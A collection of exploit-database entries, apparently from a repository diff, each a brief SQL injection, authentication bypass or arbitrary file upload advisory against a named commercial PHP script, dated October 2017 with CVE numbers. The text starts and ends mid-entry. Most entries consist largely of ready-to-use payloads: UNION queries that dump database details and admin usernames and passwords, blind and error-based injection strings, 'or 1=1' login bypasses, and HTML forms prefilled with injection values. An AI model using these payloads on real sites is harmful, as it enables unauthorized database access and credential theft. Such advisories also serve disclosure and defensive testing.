# http://localhost/[PATH]/status_list.php?status_id=[SQL]
#
# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+-
#
# Parameter: status_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 5 columns
# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
#
# Etc..
# # # # #

66
platforms/php/webapps/43068.txt Executable file
View file

@ -0,0 +1,66 @@
# # # # #
# Exploit Title: Vastal I-Tech Agent Zone - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://vastal.com/
# Software http://vastal.com/agent-zone-real-estate-script.html
# Demo: http://agentzone.vastal.com/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15991
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/searchCommercial.php?property_type=[SQL]&city=[SQL]&posted_by=[SQL]
#
# http://localhost/[PATH]/searchResidential.php?property_type=[SQL]&city=[SQL]&bedroom=[SQL]
#
# Parameter: city (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: property_type=&city=-5275 OR 1703=1703#&posted_by=
#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: property_type=&city=-1769 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (2860=2860) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
# Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by=
#
# Parameter: posted_by (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: property_type=&city=&posted_by=-5550 OR 1335=1335#
#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: property_type=&city=&posted_by=-9423 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (4134=4134) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
# Payload: property_type=&city=&posted_by=(CASE WHEN (3754=3754) THEN SLEEP(5) ELSE 3754 END)
#
# Parameter: property_type (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: property_type=-8633 OR 6527=6527#&city=&posted_by=
#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: property_type=-4342 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (3911=3911) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&city=&posted_by=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
# Payload: property_type=(CASE WHEN (2911=2911) THEN SLEEP(5) ELSE 2911 END)&city=&posted_by=
#
# Etc..
# # # # #

53
platforms/php/webapps/43069.txt Executable file
View file

@ -0,0 +1,53 @@
# # # # #
# Exploit Title: Php Inventory & Invoice Management System - Arbitrary File Upload
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://savsofteproducts.com/
# Software Link: http://www.phpinventory.com/
# Demo: http://phpinventory.com/phpinventory_demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15990
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
#
# .............1
# if($_FILES['userfile']['name']!=''){
# $target = 'images/user_pics/';
# $targets = $target . basename( $_FILES['userfile']['name']);
# $docadd=($_FILES['userfile']['name']);
# if(move_uploaded_file($_FILES['userfile']['tmp_name'], $targets))
# {
# $pfilename=$_FILES['userfile']['name'];
# $filename=time().$pfilename;
# $new_path=$target.$filename;
# rename($targets,$new_path);
# }
#
#}else{
#$filename=$_POST['user_picname'];
#}
# .............2,3,4
# $target = 'images/logo/';
# $target = 'images/product_images/';
# $target = 'images/service_providers/';
# Etc..
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/dashboard/edit_myaccountdetail/
#
# http://localhost/[PATH]/images/user_pics/[...].php
#
# Etc..
# # # # #

40
platforms/php/webapps/43070.txt Executable file
View file

@ -0,0 +1,40 @@
# # # # #
# Exploit Title: Online Exam Test Application - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/1z2e4672468/php-scripts/online-exam-test-application
# Demo: http://198.38.86.159/~onlineexamboard/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15989
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/resources.php?action=category&sort=[SQL]
#
# -8++/*!07777UNION*/+/*!07777SELECT*/+0x31,0x32,0x496873616e2053656e63616e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--+-
#
# Parameter: sort (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: action=category&sort=8 AND 5525=5525
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: action=category&sort=8 AND SLEEP(5)
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 4 columns
# Payload: action=category&sort=8 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x77654f6a51797a6c7755546b54574f68467842734c4268517654667a6e584e63634871574f4f454e,0x716b766a71),NULL-- Yhyw
#
# Etc..
# # # # #

30
platforms/php/webapps/43071.txt Executable file
View file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: Nice PHP FAQ Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.nicephpscripts.com/
# Software http://www.nicephpscripts.com/demo_php_script-PHP-FAQ-Script-Knowledgebase-Script.htm
# Demo: http://www.nicephpscripts.com/scripts/faqscript/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15988
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?nice_theme=[SQL]
#
# Parameter: nice_theme (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: nice_theme=3 AND 5083=5083
#
# Etc..
# # # # #

49
platforms/php/webapps/43072.txt Executable file
View file

@ -0,0 +1,49 @@
# # # # #
# Exploit Title: Fake Magazine Cover Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.websitescripts.org/
# Software Link: http://www.websitescripts.org/website-scripts/fake-magazine-cover-script/prod_81.html
# Demo: http://websitescripts.org/demo/magazinecoverscript/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15987
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/rate.php?value=[SQL]
#
# -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+-
#
# http://localhost/[PATH]/content.php?id=[SQL]
#
# -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+-
#
# Parameter: value (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: value=1047 AND 6465=6465
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: value=1047 AND SLEEP(5)
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: id=237 AND 1343=1343
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: id=237 AND SLEEP(5)
#
# Etc..
# # # # #

29
platforms/php/webapps/43073.txt Executable file
View file

@ -0,0 +1,29 @@
<!--
# # # # #
# Exploit Title: CPA Lead Reward Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.websitescripts.org/
# Software Link: http://www.websitescripts.org/website-scripts/cpa-lead-reward-script-incentive-script-/prod_68.html
# Demo: http://www.websitescripts.org/demo/cpaleadrewardscript/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15986
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# # # # #
-->
<form action="http://localhost/[PATH]/index.php" method="post">
<input type="text" name="username" value="' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e202d ,(SELECT (ELT(4=4,1))),VERSiON(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='"/>
<input name="password" type="password" value="eFe"/>
<input type="Submit" name="login" value="Ver Ayari" />
</form>

44
platforms/php/webapps/43074.txt Executable file
View file

@ -0,0 +1,44 @@
# # # # #
# Exploit Title: Basic B2B Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/nC3F4570353/php-scripts/basic-b2b-script
# Demo: http://readymadeb2bscript.com/product/entrepreneur/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15985
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/product_view1.php?pid=[SQL]
#
# -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+-
#
# http://localhost/[PATH]/productcompanyinfo.php?id=[SQL]
#
#
# Parameter: pid (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw
#
# Etc..
# # # # #

36
platforms/php/webapps/43075.txt Executable file
View file

@ -0,0 +1,36 @@
# # # # #
# Exploit Title: Creative Management System - CMS Lite 1.4 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://bekirk.co.uk/
# Software Link: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
# Demo: http://demo.bekirk.co.uk/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15984
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?S=[SQL]
#
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x3a,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))),0)--+-
#
# Parameter: S (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: S=BeDark' AND 7998=7998 AND 'QNRN'='QNRN
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc
#
# Etc..
# # # # #

31
platforms/php/webapps/43076.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: MyMagazine Magazine & Blog CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://geniusocean.com/
# Software Link: https://codecanyon.net/item/mymagazine-bootstrap-newspaper-magazine-and-blog-cms-script/19620468
# Demo: http://demo.geniusocean.com/mymagazine/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15983
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
#
# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
#
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
#
# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
#
# Etc..
# # # # #

31
platforms/php/webapps/43077.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: News Magazine & Blog CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://geniusocean.com/
# Software Link: https://codecanyon.net/item/news-dynamic-newspaper-magazine-and-blog-cms-script/19656143
# Demo: http://demo.geniusocean.com/news/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15982
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
#
# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
#
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
#
# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
#
# Etc..
# # # # #

31
platforms/php/webapps/43078.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://geniusocean.com/
# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325
# Demo: http://demo.geniusocean.com/newspaper/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15981
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL]
#
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+-
#
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
#
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+-
#
# Etc..
# # # # #

32
platforms/php/webapps/43079.txt Executable file
View file

@ -0,0 +1,32 @@
# # # # #
# Exploit Title: US Zip Codes Database Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://rowindex.com/
# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script
# Demo: http://rowindex.com/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15980
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL]
#
# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
#
# Parameter: state (GET)
# Type: UNION query
# Title: Generic UNION query (NULL) - 1 column
# Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM
#
# Etc..
# # # # #

30
platforms/php/webapps/43080.txt Executable file
View file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: https://odallated.com/
# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network
# Demo: https://odallated.com/shareet/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15979
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?photo=[SQL]
#
# Parameter: photo (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
#
# Etc..
# # # # #

36
platforms/php/webapps/43081.txt Executable file
View file

@ -0,0 +1,36 @@
# # # # #
# Exploit Title: AROX School ERP PHP Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://arox.in/
# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
# Demo: http://erp1.arox.in/
# Version: CVE-2017-15978
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=95&action=edit&id=3 AND SLEEP(5)
#
# Etc..
# # # # #

46
platforms/php/webapps/43082.txt Executable file
View file

@ -0,0 +1,46 @@
<!--
# # # # #
# Exploit Title: Protected Links - Expiring Download Links - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: https://codecanyon.net/item/protected-links-expiring-download-links/2556861
# Demo: http://protectedlinks.net/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15977
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
-->
<form name="login" method="post" action="http://localhost/[PATH]/index.php">
<div id="login">
<table width="200" border="0">
<tr>
<td height="45"><p>Username</p></td>
<td><label for="textfield"></label>
<input type="text" name="username" id="textfield" value="' UNION ALL SELECT 1,CONCAT(VERSiON(),0x494853414e2053454e43414e),3,4,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari"/></td>
</tr>
<tr>
<td height="45">Password</td>
<td><label for="textfield"></label>
<input type="password" name="password" id="textfield" value="Ver Ayari"/></td>
</tr>
</table>
</div>
<input type="submit" name="submit" value="LOGIN" />
</form>

40
platforms/php/webapps/43083.txt Executable file
View file

@ -0,0 +1,40 @@
# # # # #
# Exploit Title: ZeeBuddy 2x - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.zeescripts.com/
# Software Link: http://www.zeebuddy.com/
# Demo: http://www.zeebuddy.com/demo/
# Version: 2x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15976
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
#
# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
#
# Parameter: groupid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: groupid=1 AND 3188=3188
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: groupid=1 AND SLEEP(5)
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 9 columns
# Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
#
# Etc..
# # # # #

34
platforms/php/webapps/43084.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' Parameter SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://vastal.com/
# Software http://vastal.com/dating-zone-the-dating-software.html
# Demo: http://datingzone.vastal.com/demo/
# Version: 0.9.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15975
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/add_to_cart.php?product_id=[SQL]
#
# Parameter: product_id (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: product_id=3 AND SLEEP(5)
#
# Etc..
# # # # #

28
platforms/php/webapps/43085.txt Executable file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: tPanel 2009 - Authentication Bypass
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
# Demo: http://demo.datacomponents.net/tpanel/
# Version: 2009
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15974
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login.php
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

44
platforms/php/webapps/43086.txt Executable file
View file

@ -0,0 +1,44 @@
# # # # #
# Exploit Title: Sokial Social Network Script 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.sokial.net/
# Software http://www.sokial.net/demonstrations-social-network.sk
# Demo: http://demo.sokial.net/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15973
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/members_view.php?id=[SQL]
#
# 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END))
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: stacked queries
# Title: MySQL > 5.0.11 stacked queries (comment)
# Payload: id=2271;SELECT SLEEP(5)#
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: id=2271 OR SLEEP(5)
#
# Etc..
# # # # #

32
platforms/php/webapps/43087.txt Executable file
View file

@ -0,0 +1,32 @@
# # # # #
# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.softdatepro.com/
# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044
# Demo: http://demo.softdatepro.com/
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15972
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
#
